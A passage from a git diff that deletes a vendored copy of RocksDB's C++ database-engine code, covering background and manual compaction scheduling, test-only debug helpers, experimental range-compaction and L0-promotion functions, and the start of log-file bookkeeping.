-      is_manual && manual_compaction->disallow_trivial_move;
-
-  CompactionJobStats compaction_job_stats;
-  Status status = bg_error_;
-  if (status.ok() && shutting_down_.load(std::memory_order_acquire)) {
-    status = Status::ShutdownInProgress();
-  }
-
-  if (!status.ok()) {
-    if (is_manual) {
-      manual_compaction->status = status;
-      manual_compaction->done = true;
-      manual_compaction->in_progress = false;
-      manual_compaction = nullptr;
-    }
-    return status;
-  }
-
-  if (is_manual) {
-    // another thread cannot pick up the same work
-    manual_compaction->in_progress = true;
-  }
-
-  // InternalKey manual_end_storage;
-  // InternalKey* manual_end = &manual_end_storage;
-  if (is_manual) {
-    ManualCompactionState* m = manual_compaction;
-    assert(m->in_progress);
-    if (!c) {
-      m->done = true;
-      m->manual_end = nullptr;
-      ROCKS_LOG_BUFFER(log_buffer,
-                       "[%s] Manual compaction from level-%d from %s .. "
-                       "%s; nothing to do\n",
-                       m->cfd->GetName().c_str(), m->input_level,
-                       (m->begin ? m->begin->DebugString().c_str() : "(begin)"),
-                       (m->end ? m->end->DebugString().c_str() : "(end)"));
-    } else {
-      ROCKS_LOG_BUFFER(
-          log_buffer,
-          "[%s] Manual compaction from level-%d to level-%d from %s .. "
-          "%s; will stop at %s\n",
-          m->cfd->GetName().c_str(), m->input_level, c->output_level(),
-          (m->begin ? m->begin->DebugString().c_str() : "(begin)"),
-          (m->end ? m->end->DebugString().c_str() : "(end)"),
-          ((m->done || m->manual_end == nullptr)
-               ? "(end)"
-               : m->manual_end->DebugString().c_str()));
-    }
-  } else if (!is_prepicked && !compaction_queue_.empty()) {
-    if (HaveManualCompaction(compaction_queue_.front())) {
-      // Can't compact right now, but try again later
-      TEST_SYNC_POINT("DBImpl::BackgroundCompaction()::Conflict");
-
-      // Stay in the compaction queue.
-      unscheduled_compactions_++;
-
-      return Status::OK();
-    }
-
-    // cfd is referenced here
-    auto cfd = PopFirstFromCompactionQueue();
-    // We unreference here because the following code will take a Ref() on
-    // this cfd if it is going to use it (Compaction class holds a
-    // reference).
-    // This will all happen under a mutex so we don't have to be afraid of
-    // somebody else deleting it.
-    if (cfd->Unref()) {
-      delete cfd;
-      // This was the last reference of the column family, so no need to
-      // compact.
-      return Status::OK();
-    }
-
-    // Pick up latest mutable CF Options and use it throughout the
-    // compaction job
-    // Compaction makes a copy of the latest MutableCFOptions. It should be used
-    // throughout the compaction procedure to make sure consistency. It will
-    // eventually be installed into SuperVersion
-    auto* mutable_cf_options = cfd->GetLatestMutableCFOptions();
-    if (!mutable_cf_options->disable_auto_compactions && !cfd->IsDropped()) {
-      // NOTE: try to avoid unnecessary copy of MutableCFOptions if
-      // compaction is not necessary. Need to make sure mutex is held
-      // until we make a copy in the following code
-      TEST_SYNC_POINT("DBImpl::BackgroundCompaction():BeforePickCompaction");
-      c.reset(cfd->PickCompaction(*mutable_cf_options, log_buffer));
-      TEST_SYNC_POINT("DBImpl::BackgroundCompaction():AfterPickCompaction");
-      if (c != nullptr) {
-        // update statistics
-        MeasureTime(stats_, NUM_FILES_IN_SINGLE_COMPACTION,
-                    c->inputs(0)->size());
-        // There are three things that can change compaction score:
-        // 1) When flush or compaction finish. This case is covered by
-        // InstallSuperVersionAndScheduleWork
-        // 2) When MutableCFOptions changes. This case is also covered by
-        // InstallSuperVersionAndScheduleWork, because this is when the new
-        // options take effect.
-        // 3) When we Pick a new compaction, we "remove" those files being
-        // compacted from the calculation, which then influences compaction
-        // score. Here we check if we need the new compaction even without the
-        // files that are currently being compacted. If we need another
-        // compaction, we might be able to execute it in parallel, so we add it
-        // to the queue and schedule a new thread.
-        if (cfd->NeedsCompaction()) {
-          // Yes, we need more compactions!
-          AddToCompactionQueue(cfd);
-          ++unscheduled_compactions_;
-          MaybeScheduleFlushOrCompaction();
-        }
-      }
-    }
-  }
-
-  if (!c) {
-    // Nothing to do
-    ROCKS_LOG_BUFFER(log_buffer, "Compaction nothing to do");
-  } else if (c->deletion_compaction()) {
-    // TODO(icanadi) Do we want to honor snapshots here? i.e. not delete old
-    // file if there is alive snapshot pointing to it
-    assert(c->num_input_files(1) == 0);
-    assert(c->level() == 0);
-    assert(c->column_family_data()->ioptions()->compaction_style ==
-           kCompactionStyleFIFO);
-
-    compaction_job_stats.num_input_files = c->num_input_files(0);
-
-    for (const auto& f : *c->inputs(0)) {
-      c->edit()->DeleteFile(c->level(), f->fd.GetNumber());
-    }
-    status = versions_->LogAndApply(c->column_family_data(),
-                                    *c->mutable_cf_options(), c->edit(),
-                                    &mutex_, directories_.GetDbDir());
-    InstallSuperVersionAndScheduleWorkWrapper(
-        c->column_family_data(), job_context, *c->mutable_cf_options());
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Deleted %d files\n",
-                     c->column_family_data()->GetName().c_str(),
-                     c->num_input_files(0));
-    *made_progress = true;
-  } else if (!trivial_move_disallowed && c->IsTrivialMove()) {
-    TEST_SYNC_POINT("DBImpl::BackgroundCompaction:TrivialMove");
-    // Instrument for event update
-    // TODO(yhchiang): add op details for showing trivial-move.
-    ThreadStatusUtil::SetColumnFamily(
-        c->column_family_data(), c->column_family_data()->ioptions()->env,
-        immutable_db_options_.enable_thread_tracking);
-    ThreadStatusUtil::SetThreadOperation(ThreadStatus::OP_COMPACTION);
-
-    compaction_job_stats.num_input_files = c->num_input_files(0);
-
-    // Move files to next level
-    int32_t moved_files = 0;
-    int64_t moved_bytes = 0;
-    for (unsigned int l = 0; l < c->num_input_levels(); l++) {
-      if (c->level(l) == c->output_level()) {
-        continue;
-      }
-      for (size_t i = 0; i < c->num_input_files(l); i++) {
-        FileMetaData* f = c->input(l, i);
-        c->edit()->DeleteFile(c->level(l), f->fd.GetNumber());
-        c->edit()->AddFile(c->output_level(), f->fd.GetNumber(),
-                           f->fd.GetPathId(), f->fd.GetFileSize(), f->smallest,
-                           f->largest, f->smallest_seqno, f->largest_seqno,
-                           f->marked_for_compaction);
-
-        ROCKS_LOG_BUFFER(log_buffer, "[%s] Moving #%" PRIu64
-                                     " to level-%d %" PRIu64 " bytes\n",
-                         c->column_family_data()->GetName().c_str(),
-                         f->fd.GetNumber(), c->output_level(),
-                         f->fd.GetFileSize());
-        ++moved_files;
-        moved_bytes += f->fd.GetFileSize();
-      }
-    }
-
-    status = versions_->LogAndApply(c->column_family_data(),
-                                    *c->mutable_cf_options(), c->edit(),
-                                    &mutex_, directories_.GetDbDir());
-    // Use latest MutableCFOptions
-    InstallSuperVersionAndScheduleWorkWrapper(
-        c->column_family_data(), job_context, *c->mutable_cf_options());
-
-    VersionStorageInfo::LevelSummaryStorage tmp;
-    c->column_family_data()->internal_stats()->IncBytesMoved(c->output_level(),
-                                                             moved_bytes);
-    {
-      event_logger_.LogToBuffer(log_buffer)
-          << "job" << job_context->job_id << "event"
-          << "trivial_move"
-          << "destination_level" << c->output_level() << "files" << moved_files
-          << "total_files_size" << moved_bytes;
-    }
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] Moved #%d files to level-%d %" PRIu64 " bytes %s: %s\n",
-        c->column_family_data()->GetName().c_str(), moved_files,
-        c->output_level(), moved_bytes, status.ToString().c_str(),
-        c->column_family_data()->current()->storage_info()->LevelSummary(&tmp));
-    *made_progress = true;
-
-    // Clear Instrument
-    ThreadStatusUtil::ResetThreadStatus();
-  } else if (c->column_family_data()->ioptions()->compaction_style ==
-                 kCompactionStyleUniversal &&
-             !is_prepicked && c->output_level() > 0 &&
-             c->output_level() ==
-                 c->column_family_data()
-                     ->current()
-                     ->storage_info()
-                     ->MaxOutputLevel(
-                         immutable_db_options_.allow_ingest_behind) &&
-             env_->GetBackgroundThreads(Env::Priority::BOTTOM) > 0) {
-    // Forward universal compactions involving last level to the bottom pool
-    // if it exists, such that long-running compactions can't block short-
-    // lived ones, like L0->L0s.
-    TEST_SYNC_POINT("DBImpl::BackgroundCompaction:ForwardToBottomPriPool");
-    CompactionArg* ca = new CompactionArg;
-    ca->db = this;
-    ca->prepicked_compaction = new PrepickedCompaction;
-    ca->prepicked_compaction->compaction = c.release();
-    ca->prepicked_compaction->manual_compaction_state = nullptr;
-    ++bg_bottom_compaction_scheduled_;
-    env_->Schedule(&DBImpl::BGWorkBottomCompaction, ca, Env::Priority::BOTTOM,
-                   this, &DBImpl::UnscheduleCallback);
-  } else {
-    int output_level  __attribute__((unused)) = c->output_level();
-    TEST_SYNC_POINT_CALLBACK("DBImpl::BackgroundCompaction:NonTrivial",
-                             &output_level);
-
-    SequenceNumber earliest_write_conflict_snapshot;
-    std::vector<SequenceNumber> snapshot_seqs =
-        snapshots_.GetAll(&earliest_write_conflict_snapshot);
-
-    assert(is_snapshot_supported_ || snapshots_.empty());
-    CompactionJob compaction_job(
-        job_context->job_id, c.get(), immutable_db_options_, env_options_,
-        versions_.get(), &shutting_down_, log_buffer, directories_.GetDbDir(),
-        directories_.GetDataDir(c->output_path_id()), stats_, &mutex_,
-        &bg_error_, snapshot_seqs, earliest_write_conflict_snapshot,
-        table_cache_, &event_logger_,
-        c->mutable_cf_options()->paranoid_file_checks,
-        c->mutable_cf_options()->report_bg_io_stats, dbname_,
-        &compaction_job_stats);
-    compaction_job.Prepare();
-
-    mutex_.Unlock();
-    compaction_job.Run();
-    TEST_SYNC_POINT("DBImpl::BackgroundCompaction:NonTrivial:AfterRun");
-    mutex_.Lock();
-
-    status = compaction_job.Install(*c->mutable_cf_options());
-    if (status.ok()) {
-      InstallSuperVersionAndScheduleWorkWrapper(
-          c->column_family_data(), job_context, *c->mutable_cf_options());
-    }
-    *made_progress = true;
-  }
-  if (c != nullptr) {
-    c->ReleaseCompactionFiles(status);
-    *made_progress = true;
-    NotifyOnCompactionCompleted(
-        c->column_family_data(), c.get(), status,
-        compaction_job_stats, job_context->job_id);
-  }
-  // this will unref its input_version and column_family_data
-  c.reset();
-
-  if (status.ok()) {
-    // Done
-  } else if (status.IsShutdownInProgress()) {
-    // Ignore compaction errors found during shutting down
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "Compaction error: %s",
-                   status.ToString().c_str());
-    if (immutable_db_options_.paranoid_checks && bg_error_.ok()) {
-      Status new_bg_error = status;
-      // may temporarily unlock and lock the mutex.
-      EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                            BackgroundErrorReason::kCompaction,
-                                            &new_bg_error, &mutex_);
-      if (!new_bg_error.ok()) {
-        bg_error_ = new_bg_error;
-      }
-    }
-  }
-
-  if (is_manual) {
-    ManualCompactionState* m = manual_compaction;
-    if (!status.ok()) {
-      m->status = status;
-      m->done = true;
-    }
-    // For universal compaction:
-    //   Because universal compaction always happens at level 0, so one
-    //   compaction will pick up all overlapped files. No files will be
-    //   filtered out due to size limit and left for a successive compaction.
-    //   So we can safely conclude the current compaction.
-    //
-    //   Also note that, if we don't stop here, then the current compaction
-    //   writes a new file back to level 0, which will be used in successive
-    //   compaction. Hence the manual compaction will never finish.
-    //
-    // Stop the compaction if manual_end points to nullptr -- this means
-    // that we compacted the whole range. manual_end should always point
-    // to nullptr in case of universal compaction
-    if (m->manual_end == nullptr) {
-      m->done = true;
-    }
-    if (!m->done) {
-      // We only compacted part of the requested range.  Update *m
-      // to the range that is left to be compacted.
-      // Universal and FIFO compactions should always compact the whole range
-      assert(m->cfd->ioptions()->compaction_style !=
-                 kCompactionStyleUniversal ||
-             m->cfd->ioptions()->num_levels > 1);
-      assert(m->cfd->ioptions()->compaction_style != kCompactionStyleFIFO);
-      m->tmp_storage = *m->manual_end;
-      m->begin = &m->tmp_storage;
-      m->incomplete = true;
-    }
-    m->in_progress = false; // not being processed anymore
-  }
-  TEST_SYNC_POINT("DBImpl::BackgroundCompaction:Finish");
-  return status;
-}
-
-bool DBImpl::HasPendingManualCompaction() {
-  return (!manual_compaction_dequeue_.empty());
-}
-
-void DBImpl::AddManualCompaction(DBImpl::ManualCompactionState* m) {
-  manual_compaction_dequeue_.push_back(m);
-}
-
-void DBImpl::RemoveManualCompaction(DBImpl::ManualCompactionState* m) {
-  // Remove from queue
-  std::deque<ManualCompactionState*>::iterator it =
-      manual_compaction_dequeue_.begin();
-  while (it != manual_compaction_dequeue_.end()) {
-    if (m == (*it)) {
-      it = manual_compaction_dequeue_.erase(it);
-      return;
-    }
-    it++;
-  }
-  assert(false);
-  return;
-}
-
-bool DBImpl::ShouldntRunManualCompaction(ManualCompactionState* m) {
-  if (num_running_ingest_file_ > 0) {
-    // We need to wait for other IngestExternalFile() calls to finish
-    // before running a manual compaction.
-    return true;
-  }
-  if (m->exclusive) {
-    return (bg_bottom_compaction_scheduled_ > 0 ||
-            bg_compaction_scheduled_ > 0);
-  }
-  std::deque<ManualCompactionState*>::iterator it =
-      manual_compaction_dequeue_.begin();
-  bool seen = false;
-  while (it != manual_compaction_dequeue_.end()) {
-    if (m == (*it)) {
-      it++;
-      seen = true;
-      continue;
-    } else if (MCOverlap(m, (*it)) && (!seen && !(*it)->in_progress)) {
-      // Consider the other manual compaction *it, conflicts if:
-      // overlaps with m
-      // and (*it) is ahead in the queue and is not yet in progress
-      return true;
-    }
-    it++;
-  }
-  return false;
-}
-
-bool DBImpl::HaveManualCompaction(ColumnFamilyData* cfd) {
-  // Remove from priority queue
-  std::deque<ManualCompactionState*>::iterator it =
-      manual_compaction_dequeue_.begin();
-  while (it != manual_compaction_dequeue_.end()) {
-    if ((*it)->exclusive) {
-      return true;
-    }
-    if ((cfd == (*it)->cfd) && (!((*it)->in_progress || (*it)->done))) {
-      // Allow automatic compaction if manual compaction is
-      // in progress
-      return true;
-    }
-    it++;
-  }
-  return false;
-}
-
-bool DBImpl::HasExclusiveManualCompaction() {
-  // Remove from priority queue
-  std::deque<ManualCompactionState*>::iterator it =
-      manual_compaction_dequeue_.begin();
-  while (it != manual_compaction_dequeue_.end()) {
-    if ((*it)->exclusive) {
-      return true;
-    }
-    it++;
-  }
-  return false;
-}
-
-bool DBImpl::MCOverlap(ManualCompactionState* m, ManualCompactionState* m1) {
-  if ((m->exclusive) || (m1->exclusive)) {
-    return true;
-  }
-  if (m->cfd != m1->cfd) {
-    return false;
-  }
-  return true;
-}
-
-// JobContext gets created and destructed outside of the lock --
-// we
-// use this convinently to:
-// * malloc one SuperVersion() outside of the lock -- new_superversion
-// * delete SuperVersion()s outside of the lock -- superversions_to_free
-//
-// However, if InstallSuperVersionAndScheduleWork() gets called twice with the
-// same job_context, we can't reuse the SuperVersion() that got
-// malloced because
-// first call already used it. In that rare case, we take a hit and create a
-// new SuperVersion() inside of the mutex. We do similar thing
-// for superversion_to_free
-void DBImpl::InstallSuperVersionAndScheduleWorkWrapper(
-    ColumnFamilyData* cfd, JobContext* job_context,
-    const MutableCFOptions& mutable_cf_options) {
-  mutex_.AssertHeld();
-  SuperVersion* old_superversion = InstallSuperVersionAndScheduleWork(
-      cfd, job_context->new_superversion, mutable_cf_options);
-  job_context->new_superversion = nullptr;
-  job_context->superversions_to_free.push_back(old_superversion);
-}
-
-SuperVersion* DBImpl::InstallSuperVersionAndScheduleWork(
-    ColumnFamilyData* cfd, SuperVersion* new_sv,
-    const MutableCFOptions& mutable_cf_options) {
-  mutex_.AssertHeld();
-
-  // Update max_total_in_memory_state_
-  size_t old_memtable_size = 0;
-  auto* old_sv = cfd->GetSuperVersion();
-  if (old_sv) {
-    old_memtable_size = old_sv->mutable_cf_options.write_buffer_size *
-                        old_sv->mutable_cf_options.max_write_buffer_number;
-  }
-
-  auto* old = cfd->InstallSuperVersion(
-      new_sv ? new_sv : new SuperVersion(), &mutex_, mutable_cf_options);
-
-  // Whenever we install new SuperVersion, we might need to issue new flushes or
-  // compactions.
-  SchedulePendingFlush(cfd);
-  SchedulePendingCompaction(cfd);
-  MaybeScheduleFlushOrCompaction();
-
-  // Update max_total_in_memory_state_
-  max_total_in_memory_state_ =
-      max_total_in_memory_state_ - old_memtable_size +
-      mutable_cf_options.write_buffer_size *
-      mutable_cf_options.max_write_buffer_number;
-  return old;
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_debug.cc b/thirdparty/rocksdb/db/db_impl_debug.cc
deleted file mode 100644
index a4b3780..0000000
--- a/thirdparty/rocksdb/db/db_impl_debug.cc
+++ /dev/null
@@ -1,209 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef NDEBUG
-
-#include "db/db_impl.h"
-#include "monitoring/thread_status_updater.h"
-
-namespace rocksdb {
-
-uint64_t DBImpl::TEST_GetLevel0TotalSize() {
-  InstrumentedMutexLock l(&mutex_);
-  return default_cf_handle_->cfd()->current()->storage_info()->NumLevelBytes(0);
-}
-
-void DBImpl::TEST_HandleWALFull() {
-  WriteContext write_context;
-  InstrumentedMutexLock l(&mutex_);
-  HandleWALFull(&write_context);
-}
-
-int64_t DBImpl::TEST_MaxNextLevelOverlappingBytes(
-    ColumnFamilyHandle* column_family) {
-  ColumnFamilyData* cfd;
-  if (column_family == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    cfd = cfh->cfd();
-  }
-  InstrumentedMutexLock l(&mutex_);
-  return cfd->current()->storage_info()->MaxNextLevelOverlappingBytes();
-}
-
-void DBImpl::TEST_GetFilesMetaData(
-    ColumnFamilyHandle* column_family,
-    std::vector<std::vector<FileMetaData>>* metadata) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  InstrumentedMutexLock l(&mutex_);
-  metadata->resize(NumberLevels());
-  for (int level = 0; level < NumberLevels(); level++) {
-    const std::vector<FileMetaData*>& files =
-        cfd->current()->storage_info()->LevelFiles(level);
-
-    (*metadata)[level].clear();
-    for (const auto& f : files) {
-      (*metadata)[level].push_back(*f);
-    }
-  }
-}
-
-uint64_t DBImpl::TEST_Current_Manifest_FileNo() {
-  return versions_->manifest_file_number();
-}
-
-Status DBImpl::TEST_CompactRange(int level, const Slice* begin,
-                                 const Slice* end,
-                                 ColumnFamilyHandle* column_family,
-                                 bool disallow_trivial_move) {
-  ColumnFamilyData* cfd;
-  if (column_family == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    cfd = cfh->cfd();
-  }
-  int output_level =
-      (cfd->ioptions()->compaction_style == kCompactionStyleUniversal ||
-       cfd->ioptions()->compaction_style == kCompactionStyleFIFO)
-          ? level
-          : level + 1;
-  return RunManualCompaction(cfd, level, output_level, 0, begin, end, true,
-                             disallow_trivial_move);
-}
-
-Status DBImpl::TEST_SwitchMemtable(ColumnFamilyData* cfd) {
-  WriteContext write_context;
-  InstrumentedMutexLock l(&mutex_);
-  if (cfd == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  }
-  return SwitchMemtable(cfd, &write_context);
-}
-
-Status DBImpl::TEST_FlushMemTable(bool wait, ColumnFamilyHandle* cfh) {
-  FlushOptions fo;
-  fo.wait = wait;
-  ColumnFamilyData* cfd;
-  if (cfh == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfhi = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh);
-    cfd = cfhi->cfd();
-  }
-  return FlushMemTable(cfd, fo);
-}
-
-Status DBImpl::TEST_WaitForFlushMemTable(ColumnFamilyHandle* column_family) {
-  ColumnFamilyData* cfd;
-  if (column_family == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    cfd = cfh->cfd();
-  }
-  return WaitForFlushMemTable(cfd);
-}
-
-Status DBImpl::TEST_WaitForCompact() {
-  // Wait until the compaction completes
-
-  // TODO: a bug here. This function actually does not necessarily
-  // wait for compact. It actually waits for scheduled compaction
-  // OR flush to finish.
-
-  InstrumentedMutexLock l(&mutex_);
-  while ((bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ ||
-          bg_flush_scheduled_) &&
-         bg_error_.ok()) {
-    bg_cv_.Wait();
-  }
-  return bg_error_;
-}
-
-void DBImpl::TEST_LockMutex() {
-  mutex_.Lock();
-}
-
-void DBImpl::TEST_UnlockMutex() {
-  mutex_.Unlock();
-}
-
-void* DBImpl::TEST_BeginWrite() {
-  auto w = new WriteThread::Writer();
-  write_thread_.EnterUnbatched(w, &mutex_);
-  return reinterpret_cast<void*>(w);
-}
-
-void DBImpl::TEST_EndWrite(void* w) {
-  auto writer = reinterpret_cast<WriteThread::Writer*>(w);
-  write_thread_.ExitUnbatched(writer);
-  delete writer;
-}
-
-size_t DBImpl::TEST_LogsToFreeSize() {
-  InstrumentedMutexLock l(&mutex_);
-  return logs_to_free_.size();
-}
-
-uint64_t DBImpl::TEST_LogfileNumber() {
-  InstrumentedMutexLock l(&mutex_);
-  return logfile_number_;
-}
-
-Status DBImpl::TEST_GetAllImmutableCFOptions(
-    std::unordered_map<std::string, const ImmutableCFOptions*>* iopts_map) {
-  std::vector<std::string> cf_names;
-  std::vector<const ImmutableCFOptions*> iopts;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      cf_names.push_back(cfd->GetName());
-      iopts.push_back(cfd->ioptions());
-    }
-  }
-  iopts_map->clear();
-  for (size_t i = 0; i < cf_names.size(); ++i) {
-    iopts_map->insert({cf_names[i], iopts[i]});
-  }
-
-  return Status::OK();
-}
-
-uint64_t DBImpl::TEST_FindMinLogContainingOutstandingPrep() {
-  return FindMinLogContainingOutstandingPrep();
-}
-
-uint64_t DBImpl::TEST_FindMinPrepLogReferencedByMemTable() {
-  return FindMinPrepLogReferencedByMemTable();
-}
-
-Status DBImpl::TEST_GetLatestMutableCFOptions(
-    ColumnFamilyHandle* column_family, MutableCFOptions* mutable_cf_options) {
-  InstrumentedMutexLock l(&mutex_);
-
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  *mutable_cf_options = *cfh->cfd()->GetLatestMutableCFOptions();
-  return Status::OK();
-}
-
-int DBImpl::TEST_BGCompactionsAllowed() const {
-  InstrumentedMutexLock l(&mutex_);
-  return GetBGJobLimits().max_compactions;
-}
-
-int DBImpl::TEST_BGFlushesAllowed() const {
-  InstrumentedMutexLock l(&mutex_);
-  return GetBGJobLimits().max_flushes;
-}
-
-}  // namespace rocksdb
-#endif  // NDEBUG
diff --git a/thirdparty/rocksdb/db/db_impl_experimental.cc b/thirdparty/rocksdb/db/db_impl_experimental.cc
deleted file mode 100644
index 0d01075..0000000
--- a/thirdparty/rocksdb/db/db_impl_experimental.cc
+++ /dev/null
@@ -1,152 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/job_context.h"
-#include "db/version_set.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::SuggestCompactRange(ColumnFamilyHandle* column_family,
-                                   const Slice* begin, const Slice* end) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  InternalKey start_key, end_key;
-  if (begin != nullptr) {
-    start_key.SetMaxPossibleForUserKey(*begin);
-  }
-  if (end != nullptr) {
-    end_key.SetMinPossibleForUserKey(*end);
-  }
-  {
-    InstrumentedMutexLock l(&mutex_);
-    auto vstorage = cfd->current()->storage_info();
-    for (int level = 0; level < vstorage->num_non_empty_levels() - 1; ++level) {
-      std::vector<FileMetaData*> inputs;
-      vstorage->GetOverlappingInputs(
-          level, begin == nullptr ? nullptr : &start_key,
-          end == nullptr ? nullptr : &end_key, &inputs);
-      for (auto f : inputs) {
-        f->marked_for_compaction = true;
-      }
-    }
-    // Since we have some more files to compact, we should also recompute
-    // compaction score
-    vstorage->ComputeCompactionScore(*cfd->ioptions(),
-                                     *cfd->GetLatestMutableCFOptions());
-    SchedulePendingCompaction(cfd);
-    MaybeScheduleFlushOrCompaction();
-  }
-  return Status::OK();
-}
-
-Status DBImpl::PromoteL0(ColumnFamilyHandle* column_family, int target_level) {
-  assert(column_family);
-
-  if (target_level < 1) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "PromoteL0 FAILED. Invalid target level %d\n", target_level);
-    return Status::InvalidArgument("Invalid target level");
-  }
-
-  Status status;
-  VersionEdit edit;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    auto* cfd = static_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-    const auto* vstorage = cfd->current()->storage_info();
-
-    if (target_level >= vstorage->num_levels()) {
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "PromoteL0 FAILED. Target level %d does not exist\n",
-                     target_level);
-      job_context.Clean();
-      return Status::InvalidArgument("Target level does not exist");
-    }
-
-    // Sort L0 files by range.
-    const InternalKeyComparator* icmp = &cfd->internal_comparator();
-    auto l0_files = vstorage->LevelFiles(0);
-    std::sort(l0_files.begin(), l0_files.end(),
-              [icmp](FileMetaData* f1, FileMetaData* f2) {
-                return icmp->Compare(f1->largest, f2->largest) < 0;
-              });
-
-    // Check that no L0 file is being compacted and that they have
-    // non-overlapping ranges.
-    for (size_t i = 0; i < l0_files.size(); ++i) {
-      auto f = l0_files[i];
-      if (f->being_compacted) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "PromoteL0 FAILED. File %" PRIu64 " being compacted\n",
-                       f->fd.GetNumber());
-        job_context.Clean();
-        return Status::InvalidArgument("PromoteL0 called during L0 compaction");
-      }
-
-      if (i == 0) continue;
-      auto prev_f = l0_files[i - 1];
-      if (icmp->Compare(prev_f->largest, f->smallest) >= 0) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "PromoteL0 FAILED. Files %" PRIu64 " and %" PRIu64
-                       " have overlapping ranges\n",
-                       prev_f->fd.GetNumber(), f->fd.GetNumber());
-        job_context.Clean();
-        return Status::InvalidArgument("L0 has overlapping files");
-      }
-    }
-
-    // Check that all levels up to target_level are empty.
-    for (int level = 1; level <= target_level; ++level) {
-      if (vstorage->NumLevelFiles(level) > 0) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "PromoteL0 FAILED. Level %d not empty\n", level);
-        job_context.Clean();
-        return Status::InvalidArgument(
-            "All levels up to target_level "
-            "must be empty");
-      }
-    }
-
-    edit.SetColumnFamily(cfd->GetID());
-    for (const auto& f : l0_files) {
-      edit.DeleteFile(0, f->fd.GetNumber());
-      edit.AddFile(target_level, f->fd.GetNumber(), f->fd.GetPathId(),
-                   f->fd.GetFileSize(), f->smallest, f->largest,
-                   f->smallest_seqno, f->largest_seqno,
-                   f->marked_for_compaction);
-    }
-
-    status = versions_->LogAndApply(cfd, *cfd->GetLatestMutableCFOptions(),
-                                    &edit, &mutex_, directories_.GetDbDir());
-    if (status.ok()) {
-      InstallSuperVersionAndScheduleWorkWrapper(
-          cfd, &job_context, *cfd->GetLatestMutableCFOptions());
-    }
-  }  // lock released here
-  LogFlush(immutable_db_options_.info_log);
-  job_context.Clean();
-
-  return status;
-}
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_files.cc b/thirdparty/rocksdb/db/db_impl_files.cc
deleted file mode 100644
index e44e423..0000000
--- a/thirdparty/rocksdb/db/db_impl_files.cc
+++ /dev/null
@@ -1,548 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-#include "db/event_helpers.h"
-#include "util/file_util.h"
-#include "util/sst_file_manager_impl.h"
-
-
-namespace rocksdb {
-uint64_t DBImpl::FindMinPrepLogReferencedByMemTable() {
-  if (!allow_2pc()) {
-    return 0;
-  }
-
-  uint64_t min_log = 0;
-
-  // we must look through the memtables for two phase transactions
-  // that have been committed but not yet flushed
-  for (auto loop_cfd : *versions_->GetColumnFamilySet()) {
-    if (loop_cfd->IsDropped()) {
-      continue;
-    }
-
-    auto log = loop_cfd->imm()->GetMinLogContainingPrepSection();
-
-    if (log > 0 && (min_log == 0 || log < min_log)) {
-      min_log = log;
-    }
-
-    log = loop_cfd->mem()->GetMinLogContainingPrepSection();
-
-    if (log > 0 && (min_log == 0 || log < min_log)) {
-      min_log = log;
-    }
-  }
-
-  return min_log;
-}
-
-void DBImpl::MarkLogAsHavingPrepSectionFlushed(uint64_t log) {
-  assert(log != 0);
